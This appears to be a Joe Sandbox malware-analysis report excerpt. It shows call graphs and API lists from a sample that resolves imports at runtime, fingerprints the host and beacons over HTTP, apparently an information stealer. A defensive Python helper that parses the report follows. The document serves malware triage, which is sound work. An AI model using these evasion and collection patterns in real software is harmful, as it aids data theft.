API calls 26521->26522 26523 7d4a08 26522->26523 26524 7d4a60 2 API calls 26523->26524 26525 7d4a1e 26524->26525 26526 7d4a60 2 API calls 26525->26526 26527 7d4a34 26526->26527 26528 7d4a60 2 API calls 26527->26528 26529 7d4a4a 26528->26529 26530 7f66e0 26529->26530 26531 7f6afe 8 API calls 26530->26531 26532 7f66ed 43 API calls 26530->26532 26533 7f6c08 26531->26533 26534 7f6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26531->26534 26532->26531 26535 7f6c15 8 API calls 26533->26535 26536 7f6cd2 26533->26536 26534->26533 26535->26536 26537 7f6d4f 26536->26537 26538 7f6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26536->26538 26539 7f6d5c 6 API calls 26537->26539 26540 7f6de9 26537->26540 26538->26537 26539->26540 26541 7f6df6 12 API calls 26540->26541 26542 7f6f10 26540->26542 26541->26542 26543 7f6f8d 26542->26543 26544 7f6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26542->26544 26545 7f6f96 GetProcAddress GetProcAddress 26543->26545 26546 7f6fc1 26543->26546 26544->26543 26545->26546 26547 7f6fca GetProcAddress GetProcAddress 26546->26547 26548 7f6ff5 26546->26548 26547->26548 26549 7f70ed 26548->26549 26550 7f7002 10 API calls 26548->26550 26551 7f70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26549->26551 26552 7f7152 26549->26552 26550->26549 26551->26552 26553 7f716e 26552->26553 26554 7f715b GetProcAddress 26552->26554 26555 7f7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26553->26555 26556 7f051f 26553->26556 26554->26553 26555->26556 26557 7d1530 26556->26557 26866 7d1610 26557->26866 26559 7d153b 26560 7d1555 lstrcpy 26559->26560 26561 7d155d 26559->26561 26560->26561 26562 7d1577 lstrcpy 26561->26562 26563 7d157f 26561->26563 26562->26563 26564 7d1599 lstrcpy 26563->26564 26566 7d15a1 26563->26566 26564->26566 26565 7d1605 26568 7ef1b0 lstrlen 26565->26568 26566->26565 26567 7d15fd lstrcpy 26566->26567 26567->26565 
26569 7ef1e4 26568->26569 26570 7ef1eb lstrcpy 26569->26570 26571 7ef1f7 lstrlen 26569->26571 26570->26571 26572 7ef208 26571->26572 26573 7ef20f lstrcpy 26572->26573 26574 7ef21b lstrlen 26572->26574 26573->26574 26575 7ef22c 26574->26575 26576 7ef233 lstrcpy 26575->26576 26577 7ef23f 26575->26577 26576->26577 26578 7ef258 lstrcpy 26577->26578 26579 7ef264 26577->26579 26578->26579 26580 7ef286 lstrcpy 26579->26580 26581 7ef292 26579->26581 26580->26581 26582 7ef2ba lstrcpy 26581->26582 26583 7ef2c6 26581->26583 26582->26583 26584 7ef2ea lstrcpy 26583->26584 26635 7ef300 26583->26635 26584->26635 26585 7ef30c lstrlen 26585->26635 26586 7ef4b9 lstrcpy 26586->26635 26587 7ef3a1 lstrcpy 26587->26635 26588 7ef4e8 lstrcpy 26651 7ef4f0 26588->26651 26589 7ef3c5 lstrcpy 26589->26635 26590 7d1530 8 API calls 26590->26651 26591 7eee90 28 API calls 26591->26635 26592 7ef479 lstrcpy 26592->26635 26593 7ef59c lstrcpy 26593->26651 26594 7ef70f StrCmpCA 26599 7efe8e 26594->26599 26594->26635 26595 7ef616 StrCmpCA 26595->26594 26595->26651 26596 7efa29 StrCmpCA 26605 7efe2b 26596->26605 26596->26635 26597 7ef73e lstrlen 26597->26635 26598 7efead lstrlen 26611 7efec7 26598->26611 26599->26598 26601 7efea5 lstrcpy 26599->26601 26600 7efd4d StrCmpCA 26603 7efd60 Sleep 26600->26603 26613 7efd75 26600->26613 26601->26598 26602 7efa58 lstrlen 26602->26635 26603->26635 26604 7ef64a lstrcpy 26604->26651 26606 7efe4a lstrlen 26605->26606 26608 7efe42 lstrcpy 26605->26608 26619 7efe64 26606->26619 26607 7ef89e lstrcpy 26607->26635 26608->26606 26609 7eee90 28 API calls 26609->26651 26610 7ef76f lstrcpy 26610->26635 26612 7efee7 lstrlen 26611->26612 26617 7efedf lstrcpy 26611->26617 26627 7eff01 26612->26627 26614 7efd94 lstrlen 26613->26614 26615 7efd8c lstrcpy 26613->26615 26621 7efdae 26614->26621 26615->26614 26616 7efbb8 lstrcpy 26616->26635 26617->26612 26618 7efa89 lstrcpy 26618->26635 26620 7efdce lstrlen 26619->26620 26622 7efe7c lstrcpy 26619->26622 26636 7efde8 26620->26636 
26621->26620 26631 7efdc6 lstrcpy 26621->26631 26622->26620 26623 7ef791 lstrcpy 26623->26635 26625 7d1530 8 API calls 26625->26635 26626 7ef8cd lstrcpy 26626->26651 26628 7eff21 26627->26628 26633 7eff19 lstrcpy 26627->26633 26634 7d1610 4 API calls 26628->26634 26629 7efaab lstrcpy 26629->26635 26630 7ef698 lstrcpy 26630->26651 26631->26620 26632 7efbe7 lstrcpy 26632->26651 26633->26628 26643 7efe13 26634->26643 26635->26585 26635->26586 26635->26587 26635->26588 26635->26589 26635->26591 26635->26592 26635->26594 26635->26596 26635->26597 26635->26600 26635->26602 26635->26607 26635->26610 26635->26616 26635->26618 26635->26623 26635->26625 26635->26626 26635->26629 26635->26632 26641 7ef7e2 lstrcpy 26635->26641 26645 7efafc lstrcpy 26635->26645 26635->26651 26637 7efe08 26636->26637 26639 7efe00 lstrcpy 26636->26639 26640 7d1610 4 API calls 26637->26640 26638 7eefb0 35 API calls 26638->26651 26639->26637 26640->26643 26641->26635 26642 7ef924 lstrcpy 26642->26651 26643->25676 26644 7ef99e StrCmpCA 26644->26596 26644->26651 26645->26635 26646 7efc3e lstrcpy 26646->26651 26647 7efcb8 StrCmpCA 26647->26600 26647->26651 26648 7ef9cb lstrcpy 26648->26651 26649 7efce9 lstrcpy 26649->26651 26650 7efa19 lstrcpy 26650->26651 26651->26590 26651->26593 26651->26595 26651->26596 26651->26600 26651->26604 26651->26609 26651->26630 26651->26635 26651->26638 26651->26642 26651->26644 26651->26646 26651->26647 26651->26648 26651->26649 26651->26650 26652 7efd3a lstrcpy 26651->26652 26652->26651 26654 7f278c GetVolumeInformationA 26653->26654 26655 7f2785 26653->26655 26656 7f27ec GetProcessHeap RtlAllocateHeap 26654->26656 26655->26654 26658 7f2826 wsprintfA 26656->26658 26659 7f2822 26656->26659 26658->26659 26876 7f71e0 26659->26876 26663 7d4c70 26662->26663 26664 7d4c85 26663->26664 26665 7d4c7d lstrcpy 26663->26665 26880 7d4bc0 26664->26880 26665->26664 26667 7d4c90 26668 7d4ccc lstrcpy 26667->26668 26669 7d4cd8 26667->26669 26668->26669 26670 7d4cff lstrcpy 26669->26670 
26671 7d4d0b 26669->26671 26670->26671 26672 7d4d2f lstrcpy 26671->26672 26673 7d4d3b 26671->26673 26672->26673 26674 7d4d6d lstrcpy 26673->26674 26675 7d4d79 26673->26675 26674->26675 26676 7d4dac InternetOpenA StrCmpCA 26675->26676 26677 7d4da0 lstrcpy 26675->26677 26678 7d4de0 26676->26678 26677->26676 26679 7d54b8 InternetCloseHandle CryptStringToBinaryA 26678->26679 26884 7f3e70 26678->26884 26680 7d54e8 LocalAlloc 26679->26680 26697 7d55d8 26679->26697 26682 7d54ff CryptStringToBinaryA 26680->26682 26680->26697 26683 7d5529 lstrlen 26682->26683 26684 7d5517 LocalFree 26682->26684 26685 7d553d 26683->26685 26684->26697 26687 7d5557 lstrcpy 26685->26687 26688 7d5563 lstrlen 26685->26688 26686 7d4dfa 26689 7d4e23 lstrcpy lstrcat 26686->26689 26690 7d4e38 26686->26690 26687->26688 26692 7d557d 26688->26692 26689->26690 26691 7d4e5a lstrcpy 26690->26691 26694 7d4e62 26690->26694 26691->26694 26693 7d558f lstrcpy lstrcat 26692->26693 26695 7d55a2 26692->26695 26693->26695 26696 7d4e71 lstrlen 26694->26696 26698 7d55d1 26695->26698 26700 7d55c9 lstrcpy 26695->26700 26699 7d4e89 26696->26699 26697->25705 26698->26697 26701 7d4e95 lstrcpy lstrcat 26699->26701 26702 7d4eac 26699->26702 26700->26698 26701->26702 26703 7d4ed5 26702->26703 26704 7d4ecd lstrcpy 26702->26704 26705 7d4edc lstrlen 26703->26705 26704->26703 26706 7d4ef2 26705->26706 26707 7d4efe lstrcpy lstrcat 26706->26707 26708 7d4f15 26706->26708 26707->26708 26709 7d4f36 lstrcpy 26708->26709 26710 7d4f3e 26708->26710 26709->26710 26711 7d4f65 lstrcpy lstrcat 26710->26711 26712 7d4f7b 26710->26712 26711->26712 26713 7d4fa4 26712->26713 26714 7d4f9c lstrcpy 26712->26714 26715 7d4fab lstrlen 26713->26715 26714->26713 26716 7d4fc1 26715->26716 26717 7d4fcd lstrcpy lstrcat 26716->26717 26718 7d4fe4 26716->26718 26717->26718 26719 7d500d 26718->26719 26720 7d5005 lstrcpy 26718->26720 26721 7d5014 lstrlen 26719->26721 26720->26719 26722 7d502a 26721->26722 26723 7d5036 lstrcpy lstrcat 26722->26723 26724 7d504d 
26722->26724 26723->26724 26725 7d5079 26724->26725 26726 7d5071 lstrcpy 26724->26726 26727 7d5080 lstrlen 26725->26727 26726->26725 26728 7d509b 26727->26728 26729 7d50ac lstrcpy lstrcat 26728->26729 26730 7d50bc 26728->26730 26729->26730 26731 7d50da lstrcpy lstrcat 26730->26731 26732 7d50ed 26730->26732 26731->26732 26733 7d510b lstrcpy 26732->26733 26734 7d5113 26732->26734 26733->26734 26735 7d5121 InternetConnectA 26734->26735 26735->26679 26736 7d5150 HttpOpenRequestA 26735->26736 26737 7d518b 26736->26737 26738 7d54b1 InternetCloseHandle 26736->26738 26891 7f7310 lstrlen 26737->26891 26738->26679 26742 7d51a4 26899 7f72c0 26742->26899 26745 7f7280 lstrcpy 26746 7d51c0 26745->26746 26747 7f7310 3 API calls 26746->26747 26748 7d51d5 26747->26748 26749 7f7280 lstrcpy 26748->26749 26750 7d51de 26749->26750 26751 7f7310 3 API calls 26750->26751 26752 7d51f4 26751->26752 26753 7f7280 lstrcpy 26752->26753 26754 7d51fd 26753->26754 26755 7f7310 3 API calls 26754->26755 26756 7d5213 26755->26756 26757 7f7280 lstrcpy 26756->26757 26758 7d521c 26757->26758 26759 7f7310 3 API calls 26758->26759 26760 7d5231 26759->26760 26761 7f7280 lstrcpy 26760->26761 26762 7d523a 26761->26762 26763 7f72c0 2 API calls 26762->26763 26764 7d524d 26763->26764 26765 7f7280 lstrcpy 26764->26765 26766 7d5256 26765->26766 26767 7f7310 3 API calls 26766->26767 26768 7d526b 26767->26768 26769 7f7280 lstrcpy 26768->26769 26770 7d5274 26769->26770 26771 7f7310 3 API calls 26770->26771 26772 7d5289 26771->26772 26773 7f7280 lstrcpy 26772->26773 26774 7d5292 26773->26774 26775 7f72c0 2 API calls 26774->26775 26776 7d52a5 26775->26776 26777 7f7280 lstrcpy 26776->26777 26778 7d52ae 26777->26778 26779 7f7310 3 API calls 26778->26779 26780 7d52c3 26779->26780 26781 7f7280 lstrcpy 26780->26781 26782 7d52cc 26781->26782 26783 7f7310 3 API calls 26782->26783 26784 7d52e2 26783->26784 26785 7f7280 lstrcpy 26784->26785 26786 7d52eb 26785->26786 26787 7f7310 3 API calls 26786->26787 26788 7d5301 
26787->26788 26789 7f7280 lstrcpy 26788->26789 26790 7d530a 26789->26790 26791 7f7310 3 API calls 26790->26791 26792 7d531f 26791->26792 26793 7f7280 lstrcpy 26792->26793 26794 7d5328 26793->26794 26795 7f72c0 2 API calls 26794->26795 26796 7d533b 26795->26796 26797 7f7280 lstrcpy 26796->26797 26798 7d5344 26797->26798 26799 7d537c 26798->26799 26800 7d5370 lstrcpy 26798->26800 26801 7f72c0 2 API calls 26799->26801 26800->26799 26802 7d538a 26801->26802 26803 7f72c0 2 API calls 26802->26803 26804 7d5397 26803->26804 26805 7f7280 lstrcpy 26804->26805 26806 7d53a1 26805->26806 26807 7d53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 26806->26807 26808 7d549c InternetCloseHandle 26807->26808 26812 7d53f2 26807->26812 26810 7d54ae 26808->26810 26809 7d53fd lstrlen 26809->26812 26810->26738 26811 7d542e lstrcpy lstrcat 26811->26812 26812->26808 26812->26809 26812->26811 26813 7d5473 26812->26813 26814 7d546b lstrcpy 26812->26814 26815 7d547a InternetReadFile 26813->26815 26814->26813 26815->26808 26815->26812 26817 7e8cc6 ExitProcess 26816->26817 26832 7e8ccd 26816->26832 26818 7e8ee2 26818->25707 26819 7e8dbd StrCmpCA 26819->26832 26820 7e8ddd StrCmpCA 26820->26832 26821 7e8dfd StrCmpCA 26821->26832 26822 7e8e1d StrCmpCA 26822->26832 26823 7e8e3d StrCmpCA 26823->26832 26824 7e8d5a lstrlen 26824->26832 26825 7e8e56 StrCmpCA 26825->26832 26826 7e8d30 lstrlen 26826->26832 26827 7e8e6f StrCmpCA 26827->26832 26828 7e8e88 lstrlen 26828->26832 26829 7e8d06 lstrlen 26829->26832 26830 7e8d84 StrCmpCA 26830->26832 26831 7e8da4 StrCmpCA 26831->26832 26832->26818 26832->26819 26832->26820 26832->26821 26832->26822 26832->26823 26832->26824 26832->26825 26832->26826 26832->26827 26832->26828 26832->26829 26832->26830 26832->26831 26833 7e8ebb lstrcpy 26832->26833 26833->26832 26834->25713 26835->25715 26836->25721 26837->25723 26838->25729 26839->25731 26840->25737 26841->25741 26842->25747 26843->25749 26844->25753 26845->25767 26846->25771 26847->25770 26848->25766 
26849->25770 26850->25786 26851->25773 26852->25775 26853->25780 26854->25783 26855->25788 26856->25790 26857->25797 26858->25803 26859->25824 26860->25828 26861->25826 26862->25823 26863->25826 26864->25837 26867 7d161f 26866->26867 26868 7d162b lstrcpy 26867->26868 26869 7d1633 26867->26869 26868->26869 26870 7d164d lstrcpy 26869->26870 26871 7d1655 26869->26871 26870->26871 26872 7d166f lstrcpy 26871->26872 26873 7d1677 26871->26873 26872->26873 26874 7d1699 26873->26874 26875 7d1691 lstrcpy 26873->26875 26874->26559 26875->26874 26877 7f71e6 26876->26877 26878 7f71fc lstrcpy 26877->26878 26879 7f2860 26877->26879 26878->26879 26879->25702 26881 7d4bd0 26880->26881 26881->26881 26882 7d4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 26881->26882 26883 7d4c41 26882->26883 26883->26667 26885 7f3e83 26884->26885 26886 7f3e9f lstrcpy 26885->26886 26887 7f3eab 26885->26887 26886->26887 26888 7f3ecd lstrcpy 26887->26888 26889 7f3ed5 GetSystemTime 26887->26889 26888->26889 26890 7f3ef3 26889->26890 26890->26686 26893 7f732d 26891->26893 26892 7d519b 26895 7f7280 26892->26895 26893->26892 26894 7f733d lstrcpy lstrcat 26893->26894 26894->26892 26896 7f728c 26895->26896 26897 7f72b4 26896->26897 26898 7f72ac lstrcpy 26896->26898 26897->26742 26898->26897 26901 7f72dc 26899->26901 26900 7d51b7 26900->26745 26901->26900 26902 7f72ed lstrcpy lstrcat 26901->26902 26902->26900 26933 7f31f0 GetSystemInfo wsprintfA 26908 7d5869 57 API calls 26936 7e1269 408 API calls 26927 7f2d60 11 API calls 26948 7f2b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 26949 7fa280 __CxxFrameHandler 26928 7e3959 244 API calls 26934 7e01d9 126 API calls 26909 7f2853 lstrcpy 26917 7f2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 26961 7e8615 48 API calls 26910 7ee049 147 API calls 26950 7e8615 49 API calls 26918 7f3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 26962 7f33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 26937 7df639 144 API calls 
26942 7d16b9 200 API calls 26951 7dbf39 177 API calls 26963 7eabb2 120 API calls 26931 7f3130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 26955 7e4b29 303 API calls 26964 7e23a9 298 API calls 26939 7d8e20 strlen free std::exception::exception 26919 7f30a0 GetSystemPowerStatus 26935 7f29a0 GetCurrentProcess IsWow64Process 26921 7f749e 6 API calls ctype 26965 7ddb99 672 API calls 26966 7e8615 47 API calls 26912 7f8819 free free strlen free _raise 26922 7e2499 290 API calls 26932 7f4e35 8 API calls 26914 7d1011 GetCurrentProcess VirtualAllocExNuma ExitProcess VirtualAlloc VirtualFree 26915 7f2c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 26967 7f938d 126 API calls 3 library calls 26957 7db309 98 API calls 26923 7e8c88 16 API calls 26924 7f2880 10 API calls 26925 7f4480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 26926 7f3480 6 API calls 26943 7f3280 7 API calls 26958 7d7702 free ctype
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D4C7F
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D4CD2
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D4D05
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D4D35
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D4D73
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D4DA6
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007D4DB6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 90b226eaeba6317080428c9cb8f411aa684e4f315dfa74eb8a3af8b2f49b364a
                          • Instruction ID: d612436737f27ce2ef672abbcecfcfeedbc64fb41753a54790e0c17a2b986569
                          • Opcode Fuzzy Hash: 90b226eaeba6317080428c9cb8f411aa684e4f315dfa74eb8a3af8b2f49b364a
                          • Instruction Fuzzy Hash: 94525C71A1161ADBDB21EFA4DC49BAE77B9AF44310F144026F905E7352DB38AC43CBA0

                           Control-flow Graph (basic blocks with their API calls and successor blocks; the executed/not-executed colouring of the rendered graph is not recoverable in text)
                           • 2125 7f6390-7f63bd GetPEB -> 2126, 2127
                           • 2126 7f65c3-7f6623 LoadLibraryA * 5 -> 2128, 2129
                           • 2127 7f63c3-7f65be call 7f62f0, GetProcAddress * 20 -> 2126
                           • 2128 7f6638-7f663f -> 2131, 2132
                           • 2129 7f6625-7f6633 GetProcAddress -> 2128
                           • 2131 7f666c-7f6673 -> 2134, 2135
                           • 2132 7f6641-7f6667 GetProcAddress * 2 -> 2131
                           • 2134 7f6688-7f668f -> 2137, 2138
                           • 2135 7f6675-7f6683 GetProcAddress -> 2134
                           • 2137 7f66a4-7f66ab -> 2139, 2140
                           • 2138 7f6691-7f669f GetProcAddress -> 2137
                           • 2139 7f66ad-7f66d2 GetProcAddress * 2 -> 2140
                           • 2140 7f66d7-7f66da (no successors)
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,01252218), ref: 007F63E9
                          • GetProcAddress.KERNEL32(74DD0000,01252320), ref: 007F6402
                          • GetProcAddress.KERNEL32(74DD0000,01252380), ref: 007F641A
                          • GetProcAddress.KERNEL32(74DD0000,01252338), ref: 007F6432
                          • GetProcAddress.KERNEL32(74DD0000,01258F08), ref: 007F644B
                          • GetProcAddress.KERNEL32(74DD0000,01245970), ref: 007F6463
                          • GetProcAddress.KERNEL32(74DD0000,01245710), ref: 007F647B
                          • GetProcAddress.KERNEL32(74DD0000,01252488), ref: 007F6494
                          • GetProcAddress.KERNEL32(74DD0000,01252398), ref: 007F64AC
                          • GetProcAddress.KERNEL32(74DD0000,012523F8), ref: 007F64C4
                          • GetProcAddress.KERNEL32(74DD0000,012523B0), ref: 007F64DD
                          • GetProcAddress.KERNEL32(74DD0000,01245990), ref: 007F64F5
                          • GetProcAddress.KERNEL32(74DD0000,012523C8), ref: 007F650D
                          • GetProcAddress.KERNEL32(74DD0000,01252428), ref: 007F6526
                          • GetProcAddress.KERNEL32(74DD0000,01245730), ref: 007F653E
                          • GetProcAddress.KERNEL32(74DD0000,012524A0), ref: 007F6556
                          • GetProcAddress.KERNEL32(74DD0000,01252440), ref: 007F656F
                          • GetProcAddress.KERNEL32(74DD0000,012459F0), ref: 007F6587
                          • GetProcAddress.KERNEL32(74DD0000,01252500), ref: 007F659F
                          • GetProcAddress.KERNEL32(74DD0000,01245790), ref: 007F65B8
                          • LoadLibraryA.KERNEL32(01252518,?,?,?,007F1C03), ref: 007F65C9
                          • LoadLibraryA.KERNEL32(01252578,?,?,?,007F1C03), ref: 007F65DB
                          • LoadLibraryA.KERNEL32(01252530,?,?,?,007F1C03), ref: 007F65ED
                          • LoadLibraryA.KERNEL32(012525A8,?,?,?,007F1C03), ref: 007F65FE
                          • LoadLibraryA.KERNEL32(012525C0,?,?,?,007F1C03), ref: 007F6610
                          • GetProcAddress.KERNEL32(75A70000,01252560), ref: 007F662D
                          • GetProcAddress.KERNEL32(75290000,01252590), ref: 007F6649
                          • GetProcAddress.KERNEL32(75290000,012525D8), ref: 007F6661
                          • GetProcAddress.KERNEL32(75BD0000,01252548), ref: 007F667D
                          • GetProcAddress.KERNEL32(75450000,01245750), ref: 007F6699
                          • GetProcAddress.KERNEL32(76E90000,01258F18), ref: 007F66B5
                          • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 007F66CC
                          Strings
                          • NtQueryInformationProcess, xrefs: 007F66C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                           • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: 49c579d8de8c87e393e6c4d7d0249496ad118a26b7291e4082b39a09bd8539af
                          • Instruction ID: 07fa090d5b7a318bc1a09c74cdd99641ee629215e48f3f309e4e9d3ec310e9d2
                          • Opcode Fuzzy Hash: 49c579d8de8c87e393e6c4d7d0249496ad118a26b7291e4082b39a09bd8539af
                          • Instruction Fuzzy Hash: 8FA16CB5A112089FD754DFE4EC98A273BB9F7887403008519E996C3366DB78A843DF68
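
The two resolver functions on this page, 007F6390 above and 007F66E0 further down, follow the same pattern: read the PEB, then call GetProcAddress dozens of times against a handful of module bases, with LoadLibraryA in between for modules that are not yet mapped. In nearly every call the second argument is printed as an address in the sample's memory rather than as a string, so the export names were assembled or decoded at runtime and only a few (NtQueryInformationProcess, CreateDesktopA, OpenDesktopA, CloseDesktop) survive in plaintext. The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses API lines in this report's format, groups GetProcAddress calls by hModule, separates plaintext export names from opaque pointers, and uses the plaintext names to put a DLL name on a base address, which then also covers every opaque resolution against that base. The embedded lines are a constructed excerpt copied from the two functions' API lists; KNOWN_EXPORTS is an assumed lookup of well-known exports and is not something the report states.

```python
import re
from collections import defaultdict

# Constructed excerpt: lines copied from the "APIs" lists of 007F6390 and
# 007F66E0 on this page, in the report's own format.
REPORT_LINES = """\
• GetProcAddress.KERNEL32(74DD0000,01252218), ref: 007F63E9
• GetProcAddress.KERNEL32(74DD0000,01252320), ref: 007F6402
• LoadLibraryA.KERNEL32(01252518,?,?,?,007F1C03), ref: 007F65C9
• LoadLibraryA.KERNEL32(01252578,?,?,?,007F1C03), ref: 007F65DB
• GetProcAddress.KERNEL32(75A70000,01252560), ref: 007F662D
• GetProcAddress.KERNEL32(76E90000,01258F18), ref: 007F66B5
• GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 007F66CC
• GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 007F6ED7
• GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 007F6EEE
• GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 007F6F05
"""

# "API.DLL(arg, arg, ...), ref: ADDRESS" with an optional leading bullet
LINE_RE = re.compile(
    r"^\s*[•*-]?\s*(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
HEX_PTR_RE = re.compile(r"^[0-9A-Fa-f]{8}$")   # a pointer the sandbox could not print as a string

# ASSUMED lookup of well-known exports to their DLL, used to name module bases.
KNOWN_EXPORTS = {
    "NtQueryInformationProcess": "ntdll.dll",
    "CreateDesktopA": "user32.dll",
    "OpenDesktopA": "user32.dll",
    "CloseDesktop": "user32.dll",
}


def parse_api_line(line: str):
    """Return {api, dll, args, ref} for one report line, or None if it is not an API line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"api": m["api"], "dll": m["dll"],
            "args": [a.strip() for a in m["args"].split(",")],
            "ref": int(m["ref"], 16)}


def summarize_resolution(lines):
    """Group GetProcAddress calls by hModule; split name arguments into plaintext
    exports and opaque pointers; count LoadLibraryA calls."""
    modules = defaultdict(lambda: {"count": 0, "named": [], "opaque": 0})
    loadlib = 0
    for raw in lines:
        rec = parse_api_line(raw)
        if rec is None:
            continue
        if rec["api"] == "LoadLibraryA":
            loadlib += 1
        elif rec["api"] == "GetProcAddress" and len(rec["args"]) >= 2:
            hmod, name = rec["args"][:2]
            entry = modules[hmod]
            entry["count"] += 1
            if HEX_PTR_RE.match(name):
                entry["opaque"] += 1    # name built or decoded at runtime
            else:
                entry["named"].append(name)
    return {"loadlibrary_calls": loadlib, "modules": dict(modules)}


def label_modules(summary):
    """Name each module base from its plaintext exports; every opaque
    resolution against the same base then belongs to that DLL as well."""
    labels = {}
    for hmod, entry in summary["modules"].items():
        dlls = {KNOWN_EXPORTS[n] for n in entry["named"] if n in KNOWN_EXPORTS}
        labels[hmod] = dlls.pop() if len(dlls) == 1 else None
    return labels


def opaque_ratio(summary) -> float:
    """Fraction of GetProcAddress calls whose export name was not printable: the
    higher, the more of the import surface is hidden from static analysis."""
    total = sum(e["count"] for e in summary["modules"].values())
    opaque = sum(e["opaque"] for e in summary["modules"].values())
    return opaque / total if total else 0.0


if __name__ == "__main__":
    s = summarize_resolution(REPORT_LINES.splitlines())
    for hmod, dll in label_modules(s).items():
        e = s["modules"][hmod]
        print(f"{hmod}: {e['count']:3d} resolutions, {e['opaque']} opaque, "
              f"named={e['named']}, dll={dll or 'unknown'}")
    print(f"LoadLibraryA calls: {s['loadlibrary_calls']}, opaque ratio {opaque_ratio(s):.2f}")
```

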